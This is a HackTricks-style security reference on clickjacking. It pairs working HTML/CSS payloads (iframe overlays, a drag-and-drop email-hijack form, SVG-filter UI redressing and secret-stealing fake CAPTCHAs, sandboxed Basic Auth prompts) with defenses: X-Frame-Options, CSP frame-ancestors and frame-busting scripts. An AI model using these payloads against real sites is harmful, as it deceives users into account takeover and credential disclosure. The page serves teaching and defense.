Clickjacking
Tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
What is Clickjacking
In a Clickjacking attack, a user is tricked into clicking an element on a web page that is either invisible or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as downloading malware, being redirected to malicious web pages, providing credentials or sensitive information, transferring money, or purchasing products online.
Prepopulate forms trick
Sometimes it is possible to fill the value of fields of a form using GET parameters when loading a page. An attacker can abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so that the user only has to press the Submit button.
Populate form with Drag&Drop
If you need the user to fill a form but you don't want to directly ask them to enter specific information (like an email or a specific password that you know), you can just ask them to Drag&Drop something that will write your controlled data, as in this example.
Basic Payload
```html
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 0.1;
    z-index: 2;
  }
  div {
    position: absolute;
    top: 470px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
```
Multistep Payload
```html
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 500px;
    opacity: 0.1;
    z-index: 2;
  }
  .firstClick, .secondClick {
    position: absolute;
    top: 330px;
    left: 60px;
    z-index: 1;
  }
  .secondClick {
    left: 210px;
  }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
```
Drag&Drop + Click payload
```html
<html>
<head>
  <style>
    #payload {
      position: absolute;
      top: 20px;
    }
    iframe {
      width: 1000px;
      height: 675px;
      border: none;
    }
    .xss {
      position: fixed;
      background: #F00;
    }
  </style>
</head>
<body>
  <div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
  <div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
  <div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
  <iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3" src="https://target.com/panel/administration/profile/"></iframe>
  <div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>
```
XSS + Clickjacking
If you have identified an XSS attack that requires the user to click on some element to trigger the XSS, and the page is vulnerable to Clickjacking, you can abuse it to trick the user into clicking the button/link.
Example:
You have found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking, and you can prepopulate the form with GET parameters.
An attacker could prepare a Clickjacking attack on that page, prepopulating the form with the XSS payload and tricking the user into submitting the form. So, when the form is submitted and the values are modified, the user will execute the XSS.
DoubleClickjacking
First explained in this post, this technique asks the victim to double-click a button on a specially crafted page placed at a specific position, and abuses the timing difference between the mousedown and onclick events to load the victim page during the double click, so that the victim actually clicks a legitimate button on the victim page.
An example can be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18
A code example can be found on this page.
Warning
This technique allows tricking the user into clicking one spot on the victim page, bypassing every protection against clickjacking. Therefore the attacker needs to find sensitive actions that can be performed with just one click, like OAuth prompts accepting permissions.
SVG Filters / Cross-Origin Iframe UI Redressing
Modern Chromium/WebKit/Gecko versions allow CSS filter:url(#id) to be applied to cross-origin iframes. The rasterised iframe pixels are fed into the SVG filter graph as SourceGraphic, so primitives like feDisplacementMap, feBlend, feComposite, feColorMatrix, feTile, feMorphology, etc. can arbitrarily transform the victim UI before the user sees it, even though the attacker never touches the DOM. A simple Liquid-Glass style filter looks like:
```html
<iframe src="https://victim.example" style="filter:url(#displacementFilter4)"></iframe>
```
Key primitives:
- feImage loads attacker bitmaps (e.g., overlays, displacement maps);
- feFlood builds constant-color mattes;
- feOffset/feGaussianBlur refine highlights;
- feDisplacementMap refracts/warps text;
- feComposite operator="arithmetic" implements arbitrary per-channel math (r = k1*i1*i2 + k2*i1 + k3*i2 + k4), which is enough for contrast boosting, masking, and AND/OR operations;
- feTile crops and replicates pixel probes;
- feMorphology grows/shrinks strokes;
- feColorMatrix moves luma into alpha to build precise masks.
Distorting secrets into CAPTCHA-style prompts
If a framable endpoint displays secrets (tokens, reset codes, API keys), an attacker can distort them so they look like a CAPTCHA and coerce manual transcription:
```html
<svg width="0" height="0">
  <filter id="captchaFilter">
    <feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="noise" />
    <feDisplacementMap in="SourceGraphic" in2="noise" scale="6" xChannelSelector="R" yChannelSelector="G" />
  </filter>
</svg>
<iframe src="https://victim" style="filter:url(#captchaFilter)"></iframe>
<input pattern="^6c79 ?7261 ?706f ?6e79$" required>
```
The distorted pixels trick the user into “solving” the captcha inside an attacker-controlled <input>, whose pattern enforces the victim's real secret.
Rewriting the victim's input context
Filters can carefully erase placeholder/validation text while preserving the user's own keystrokes. One pipeline:
- feComposite operator="arithmetic" k2≈4 boosts brightness until grey helper text turns white.
- feTile trims the working area to the input rectangle.
- feMorphology operator="erode" thickens the dark glyphs typed by the victim and exposes them via result="thick".
- feFlood builds a white plate; feBlend mode="difference" with thick and a second feComposite k2≈100 turn it into a hard luma matte.
- feColorMatrix moves that luma into alpha, and feComposite in="SourceGraphic" operator="in" keeps only the glyphs typed by the user.
- Another feBlend in2="white" plus a thin crop yields a clean text box, after which the attacker places their own HTML labels (for example, “Enter your email”) while the hidden iframe still enforces the victim origin's password policy.
Safari lacks feTile; the same effect can be rebuilt with spatial mattes constructed from feFlood + feColorMatrix + feComposite for WebKit-only payloads.
Pixel probing, logic and state machines
By cropping a 2–4 px region with feTile and tiling it to 100% of the viewport, an attacker turns a chosen colour into a full-frame texture that can be thresholded into a boolean mask:
```html
<filter id="pixelProbe">
  <feTile x="313" y="141" width="4" height="4" />
  <feTile x="0" y="0" width="100%" height="100%" result="probe" />
  <feComposite in="probe" operator="arithmetic" k2="120" k4="-1" />
  <feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0" result="mask" />
  <feGaussianBlur in="SourceGraphic" stdDeviation="2" />
  <feComposite operator="in" in2="mask" />
  <feBlend in2="SourceGraphic" />
</filter>
```
For arbitrary colours, a feFlood reference (e.g., #0B57D0) together with feBlend mode="difference" and another arithmetic composite (k2≈100, k4 as tolerance) yields white only when the probed pixel matches the target tone. Combining these masks with feComposite and carefully chosen k1..k4 yields logic gates: AND with k1=1, OR with k2=k3=1, XOR with feBlend mode="difference", NOT by blending against white. Chaining gates builds a full adder inside the filter graph, showing that the pipeline is functionally complete.
Attackers can therefore read UI state without JavaScript. Example booleans from a modal flow:
- D (dialog visible): probe a dimmed corner and test against white.
- L (dialog loaded): probe the coordinate where a button appears once it is ready.
- C (checkbox selected): compare the checkbox pixel against the active blue #0B57D0.
- R (red success/failure banner): use feMorphology and red thresholds inside the banner rectangle.
Each detected state gates a different overlay bitmap placed via feImage xlink:href="data:...". Masking those bitmaps with D, L, C, R keeps the overlays in sync with the real dialog and walks the victim through multi-step procedures (password resets, approvals, destructive confirmations) without ever exposing the DOM.
Sandboxed iframe Basic Auth dialog (no allow-popups)
A sandboxed iframe without allow-popups can still display the browser-controlled HTTP Basic Authentication modal when the load returns 401 with WWW-Authenticate. The dialog is spawned by the browser's networking/auth layer (not JS alert/prompt/confirm), so the popup restrictions inside the sandbox do not apply. If you can script the iframe (e.g., sandbox="allow-scripts"), you can point it at any endpoint issuing a Basic Auth challenge:
```html
<iframe id="basic" sandbox="allow-scripts"></iframe>
<script>
  basic.src = "https://httpbin.org/basic-auth/user/pass";
</script>
```
Once the response arrives, the browser prompts for credentials even though popups are disallowed. Framing a trusted origin with this technique enables UI redress/phishing: unexpected modal prompts inside a “sandboxed” widget can confuse users or cause password managers to offer managed credentials.
Browser extensions: DOM-based autofill clickjacking
Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.
- For concrete techniques and PoCs see: BrowExt - ClickJacking
Strategies to Mitigate Clickjacking
Client-Side Defenses
Scripts executed on the client side can perform actions to prevent Clickjacking:
- Ensuring that the application window is the main or top window.
- Making all frames visible.
- Preventing clicks on invisible frames.
- Detecting and alerting users to potential Clickjacking attempts.
However, these frame-busting scripts can be circumvented:
- Browser security settings: Some browsers may block these scripts based on their security settings or lack of JavaScript support.
- HTML5 iframe sandbox attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying whether it is the top window, e.g.,
```html
<iframe
  id="victim_website"
  src="https://victim-website.com"
  sandbox="allow-forms allow-scripts"></iframe>
```
The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.
Server-side defenses
X-Frame-Options
The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page in a <frame> or <iframe>, helping to prevent Clickjacking:
- X-Frame-Options: deny - No domain can frame the content.
- X-Frame-Options: sameorigin - Only the same site can frame the content.
- X-Frame-Options: allow-from https://trusted.com - Only the specified ‘uri’ can frame the page.
- Note the limitations: if the browser doesn't support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.
Content Security Policy (CSP) frame-ancestors directive
The frame-ancestors directive in CSP is the recommended method for Clickjacking protection:
- frame-ancestors 'none' - Similar to X-Frame-Options: deny.
- frame-ancestors 'self' - Similar to X-Frame-Options: sameorigin.
- frame-ancestors trusted.com - Similar to X-Frame-Options: allow-from.
For instance, the following CSP only allows framing from the same domain:
```http
Content-Security-Policy: frame-ancestors 'self';
```
Further details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla's CSP frame-ancestors documentation.
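As an added example (not code from the original page or from HackTricks), the following Node.js function applies the header rules from the two sections above to a set of response headers and reports whether framing is restricted. It encodes the precedence the text describes: an enforced CSP frame-ancestors directive wins over X-Frame-Options, allow-from is rated weak because modern browsers ignore it, and a frame-ancestors directive delivered only in Content-Security-Policy-Report-Only is not enforced. The header sets at the bottom are constructed for illustration, not captured from any real site.

```javascript
// Added example, not code from the original page: classify the anti-framing
// headers of an HTTP response. Headers are passed as a plain object; if a
// header was sent more than once, join the values with ", " before calling.

// Extract the frame-ancestors source list from a CSP header value.
// Returns an array of lower-cased sources (surrounding quotes stripped), or
// null when the directive is absent.
function parseFrameAncestors(cspValue) {
  if (!cspValue) return null;
  for (const directive of cspValue.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0 && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.replace(/^'|'$/g, '').toLowerCase());
    }
  }
  return null;
}

// Returns { level, reason } where level is 'strong', 'weak' or 'none'.
function assessFramingProtection(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value);
  }

  // An enforced frame-ancestors directive takes precedence over X-Frame-Options.
  const ancestors = parseFrameAncestors(h['content-security-policy']);
  if (ancestors !== null) {
    if (ancestors.length === 0 || ancestors.includes('none')) {
      return { level: 'strong', reason: "frame-ancestors 'none'" };
    }
    // '*' or a bare scheme such as https: lets any origin frame the page.
    if (ancestors.includes('*') || ancestors.some((s) => /^https?:$/.test(s))) {
      return { level: 'none', reason: 'frame-ancestors permits any origin' };
    }
    return { level: 'strong', reason: `frame-ancestors ${ancestors.join(' ')}` };
  }

  const xfo = (h['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny' || xfo === 'sameorigin') {
    return { level: 'strong', reason: `X-Frame-Options: ${xfo}` };
  }
  if (xfo.startsWith('allow-from')) {
    return { level: 'weak', reason: 'X-Frame-Options allow-from is ignored by modern browsers' };
  }
  if (xfo) {
    return { level: 'none', reason: `unrecognised X-Frame-Options value "${xfo}"` };
  }

  // Report-only policies are logged by the browser, never enforced.
  if (parseFrameAncestors(h['content-security-policy-report-only']) !== null) {
    return { level: 'none', reason: 'frame-ancestors only present in a report-only policy' };
  }
  return { level: 'none', reason: 'no anti-framing header' };
}

// Constructed sample responses (not captured from any real site).
const SAMPLE_RESPONSES = {
  unprotected: {},
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  xfoAllowFrom: { 'X-Frame-Options': 'ALLOW-FROM https://trusted.com' },
  cspSelf: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
  cspWildcardOverridesXfo: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
  reportOnly: { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
};

for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
  const { level, reason } = assessFramingProtection(headers);
  console.log(`${name.padEnd(24)} ${level.padEnd(7)} ${reason}`);
}
```

The cspWildcardOverridesXfo case is the one worth remembering when auditing: a DENY header is not a guarantee if a later-added CSP carries a permissive frame-ancestors, because browsers that understand CSP ignore X-Frame-Options once frame-ancestors is present.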
Content Security Policy (CSP) child-src and frame-src
Content Security Policy (CSP) is a security measure that helps prevent Clickjacking and other code injection attacks by specifying which sources the browser should allow to load content from.
frame-src Directive
- Defines valid sources for frames.
- More specific than the default-src directive.
```http
Content-Security-Policy: frame-src 'self' https://trusted-website.com;
```
This policy allows frames from the same origin (self) and https://trusted-website.com.
child-src Directive
- Introduced in CSP level 2 to set valid sources for web workers and frames.
- Acts as a fallback for frame-src and worker-src.
```http
Content-Security-Policy: child-src 'self' https://trusted-website.com;
```
This policy allows frames and workers from the same origin (self) and https://trusted-website.com.
Usage Notes:
- Deprecation: child-src is being phased out in favour of frame-src and worker-src.
- Fallback behaviour: If frame-src is absent, child-src is used as a fallback for frames. If both are absent, default-src is used.
- Strict source definition: Include only trusted sources in the directives to prevent exploitation.
JavaScript frame-breaking scripts
Although not completely foolproof, JavaScript-based frame-busting scripts can be used to prevent a web page from being framed. Example:
```javascript
// If this document is not the top-level window, navigate the top window to it.
if (top !== self) {
  top.location = self.location;
}
```
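As an added example (not code from the original page), here is the hide-then-reveal variant of the frame buster described in the OWASP Clickjacking Defense Cheat Sheet listed in the references. The page starts with its body hidden by a style element; the script removes that style only once it has confirmed it runs in the top window, and otherwise tries to navigate the top window to itself. The difference from the snippet above is what happens when the navigation is refused (for example by the sandbox attribute without allow-top-navigation, covered under client-side defenses): the content simply stays hidden instead of remaining clickable. The decision logic takes the window object as a parameter so it can be exercised with stand-in objects outside a browser; the names applyFrameBusting, framingDecision and the element id antiClickjack are chosen for this example.

```javascript
// Added example, not code from the original page. Browser usage:
//
//   <head>
//     <style id="antiClickjack">body { display: none !important; }</style>
//     <script>/* this file */ applyFrameBusting(window, document);</script>
//   </head>
//
// The names applyFrameBusting, framingDecision and antiClickjack are chosen here.

// Pure decision: 'reveal' when win is the top-level browsing context, 'bust' otherwise.
function framingDecision(win) {
  return win.self === win.top ? 'reveal' : 'bust';
}

// Apply the decision to a window/document pair. Returns the decision so a
// caller (or a test) can check what happened.
function applyFrameBusting(win, doc) {
  const decision = framingDecision(win);
  if (decision === 'reveal') {
    // Safe to show the page: drop the style element that hides <body>.
    const hider = doc.getElementById('antiClickjack');
    if (hider && hider.parentNode) hider.parentNode.removeChild(hider);
  } else {
    // Framed: try to break out. If the framing page sandboxed us without
    // allow-top-navigation this assignment is refused; the body then stays
    // hidden, so there is nothing for a coerced click to land on.
    try {
      win.top.location = win.self.location;
    } catch (err) {
      // Navigation blocked: fail closed by leaving the body hidden.
    }
  }
  return decision;
}

// Stand-in window/document objects so the logic can be run outside a browser.
function makeTopWindow() {
  const w = { location: 'https://app.example/' };
  w.self = w;
  w.top = w;
  return w;
}

// A window nested inside topWin. With blockNavigation set, writes to
// topWin.location throw, emulating a sandboxed frame that may not navigate top.
function makeFramedWindow(topWin, blockNavigation) {
  const w = { location: 'https://app.example/' };
  w.self = w;
  w.top = topWin;
  if (blockNavigation) {
    Object.defineProperty(topWin, 'location', {
      configurable: true,
      get() { return 'https://attacker.example/'; },
      set() { throw new Error('SecurityError: navigation blocked by sandbox'); },
    });
  }
  return w;
}

// Minimal document stub that records whether the hiding style was removed.
function makeDocument() {
  const state = { hiderRemoved: false };
  const hider = { parentNode: { removeChild() { state.hiderRemoved = true; } } };
  return { state, getElementById: (id) => (id === 'antiClickjack' ? hider : null) };
}

// Demo run.
const demoDoc = makeDocument();
console.log('top window:', applyFrameBusting(makeTopWindow(), demoDoc), 'revealed:', demoDoc.state.hiderRemoved);
const sandboxTop = makeTopWindow();
console.log('sandboxed frame:', applyFrameBusting(makeFramedWindow(sandboxTop, true), makeDocument()));
```

In the sandboxed run the call returns 'bust' without throwing and the document stub reports that the hiding style was never removed, which is the behaviour a server-side frame-ancestors policy should back up rather than replace.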
Employing Anti-CSRF Tokens
- Token Validation: Use anti-CSRF tokens in web applications to ensure that state-changing requests are made intentionally by the user and not through a Clickjacked page.
References
- https://portswigger.net/web-security/clickjacking
- https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html
- DOM-based Extension Clickjacking (marektoth.com)
- SVG Filters - Clickjacking 2.0
- Iframe sandbox Basic Auth modal
- Chromestatus: Restrict sandboxed frame dialogs
- Chromium issue about sandboxed auth dialogs